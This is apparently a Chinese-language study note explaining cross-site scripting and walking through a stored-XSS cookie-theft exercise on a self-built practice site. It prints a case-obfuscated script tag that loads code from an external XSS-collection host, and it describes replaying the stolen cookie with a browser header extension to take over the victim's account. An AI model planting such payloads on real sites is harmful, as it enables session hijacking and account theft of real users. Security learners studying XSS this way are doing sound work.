一、概念
Cross Site Scripting(XSS),跨站脚本攻击。
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
二、原理
攻击者提供一段恶意的javascript代码,通过各种方式在受害者浏览器(暂定)上执行。
三、危害
- 窃取coockie
- 制造网站蠕虫
- 钓鱼
四、练习思路步骤(自创建靶场测试)
1.受害者注册账号
2.攻击者注册xss平台账号,创建项目,获取恶意代码
恶意代码:
<sCRiPt sRC=//xss.yt/mLSq></sCrIpT>
3.攻击者发布一个带有攻击代码的帖子(引诱受害者点击)
4.受害者因好奇等原因打开该帖子,中招
(PS:太可恶啦!!)
5.攻击者收获cookie,以受害者身份活动
使用火狐浏览器的modheader插件将Cookie添加到请求信息中
攻击者再进入该网站,就自动登录进被攻击者账号